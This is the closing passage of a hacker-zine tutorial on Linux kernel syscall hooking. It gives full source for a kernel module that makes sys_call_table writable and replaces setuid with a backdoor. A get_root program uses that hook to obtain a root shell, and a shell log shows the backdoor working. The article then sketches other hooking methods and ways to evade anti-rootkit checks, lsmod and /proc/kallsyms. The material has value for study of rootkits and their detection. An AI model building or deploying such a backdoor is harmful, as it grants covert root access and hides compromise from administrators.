page *p[2]; void *sct; unsigned long addr = (unsigned long)sct_addr & PAGE_MASK; if (sct_addr == NULL) return NULL; #if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,22) && defined(__x86_64__) p[0] = pfn_to_page(__pa_symbol(addr) >> PAGE_SHIFT); p[1] = pfn_to_page(__pa_symbol(addr + PAGE_SIZE) >> PAGE_SHIFT); #else p[0] = virt_to_page(addr); p[1] = virt_to_page(addr + PAGE_SIZE); #endif sct = vmap(p, 2, VM_MAP, PAGE_KERNEL); if (sct == NULL) return NULL; return sct + offset_in_page(sct_addr); } static int __init hook_init(void) { sys_call_table = get_writable_sct(get_sys_call_table()); if (sys_call_table == NULL) return -1; #ifdef CONFIG_IA32_EMULATION ia32_sys_call_table = get_writable_sct(get_ia32_sys_call_table()); if (ia32_sys_call_table == NULL) { vunmap((void*)((unsigned long)sys_call_table & PAGE_MASK)); return -1; } #endif /* hook setuid */ #ifdef __NR_setuid32 real_setuid = sys_call_table[__NR_setuid32]; sys_call_table[__NR_setuid32] = hooked_setuid; #else real_setuid = sys_call_table[__NR_setuid]; sys_call_table[__NR_setuid] = hooked_setuid; #endif #ifdef CONFIG_IA32_EMULATION #ifdef __NR32_setuid32 ia32_sys_call_table[__NR32_setuid32] = hooked_setuid; #else ia32_sys_call_table[__NR32_setuid] = hooked_setuid; #endif #endif /***************/ return 0; } static void __exit hook_exit(void) { /* unhook setuid */ #ifdef __NR_setuid32 sys_call_table[__NR_setuid32] = real_setuid; #else sys_call_table[__NR_setuid] = real_setuid; #endif #ifdef CONFIG_IA32_EMULATION #ifdef __NR32_setuid32 ia32_sys_call_table[__NR32_setuid32] = real_setuid; #else ia32_sys_call_table[__NR32_setuid] = real_setuid; #endif #endif /*****************/ // unmap memory vunmap((void*)((unsigned long)sys_call_table & PAGE_MASK)); #ifdef CONFIG_IA32_EMULATION vunmap((void*)((unsigned long)ia32_sys_call_table & PAGE_MASK)); #endif } module_init(hook_init); module_exit(hook_exit); MODULE_LICENSE("GPL"); --EOF-- --file: get_root.c-- #include <unistd.h> int main() { if (setuid(31337) == -1) { perror("setuid"); return 1; } execlp("bash", "bash", NULL); } --EOF-- oblique@gentoo ~/hooking $ ./configure.sh oblique@gentoo ~/hooking $ make make -C /lib/modules/2.6.34-zen1/build M=/home/oblique/hooking modules make[1]: Entering directory `/usr/src/linux-2.6.34-zen1-r2' CC [M] /home/oblique/hooking/hook_setuid.o Building modules, stage 2. MODPOST 1 modules CC /home/oblique/hooking/hook_setuid.mod.o LD [M] /home/oblique/hooking/hook_setuid.ko make[1]: Leaving directory `/usr/src/linux-2.6.34-zen1-r2' oblique@gentoo ~/hooking $ sudo insmod hook_setuid.ko oblique@gentoo ~/hooking $ gcc get_root.c -o get_root oblique@gentoo ~/hooking $ ./get_root gentoo hooking # id uid=0(root) gid=0(root) groups=0(root) gentoo hooking # rmmod hook_setuid gentoo hooking # exit exit oblique@gentoo ~/hooking $ ./get_root setuid: Operation not permitted oblique@gentoo ~/hooking $ --[ 0x0B Other ideas/methods What we saw, was one of the most basic hooking techniques. There are lots of equivalent techniques: for example, to avoid editing the sys_call_table, we can just allocate a buffer in kernel memory and copy the sys_call_table there. Then we change the addresses in the new array and finally we change the address called by the system_call. If we want, we can change the intrerrupt's 0x80 value from IDT, or the value of IA32_LSTAR MSR, pointing to another system_call. One other elegant hooking method, independent from system calls, is hooking the debugger's trap. This can be implemented using the interrupt 3 from IDT. This technique has some limitations. It cannot be applied in systems which have the LKM support disabled. Modules *must* be compiled for the same kernel they are going to be loaded from, which means that with a kernel update, module needs to be re-compiled. Solutions for these issues are provided by some userland-based techniques which can change the kernel memory through /dev/mem or /dev/kmem, but in this case other forms of protection need to be faced. Notice: Anti-rootkits usually check the sys_call_table, so the method shown here should not be used. Maybe some workaround is to change sys_call_table's address inside system_call, or implement our own system_call. Moreover with lsmod or through /proc/kallsyms, a sys-admin should be able to notice that something goes wrong...but hooking can solve all these issues. I hope you enjoyed reading the article as much as I enjoyed writing it :) Happy hacking, oblique. --[ 0x0C Greets Greets to grhack.net community, AthCon staff and p0wnbox.Team. Special thanks to slasher, huku, sin, Hack_ThE_PaRaDiSe, krumel, smack for their knowledge and their company. Thanks pytt, angel_scar and killer_null for being good friends. Last but not least I want to give kudos to my friends from the real world, psychedelic music and FF.C for their songs and philosophy. --[ 0x0D References [1] http://phrack.org/issues.html?issue=59&id=4#article [2] http://phrack.org/issues.html?issue=58&id=7#article [3] http://wiki.osdev.org/IDT#IDT_in_IA-32e_Mode_.2864-bit_IDT.29 [5] Linux Kernel source code (http://kernel.org) [6] KSplice source code (http://www.ksplice.com/software) Intel 64 and IA-32 Architectures Software Developer's Manual (http://www.intel.com/products/processor/manuals/): [7] "Volume 3A: System Programming Guide", Sections: 5.8.7 - 5.9, 9.4 [8] "Volume 3B: System Programming Guide", Appendix B [9] "Volume 2B: Instruction Set Reference, N-Z", Section: 4.2, Instructions: RDMSR, WRMSR, SYSCALL _______________________________|_._._._._._, \ EOF |_X_X_X_X_X_| !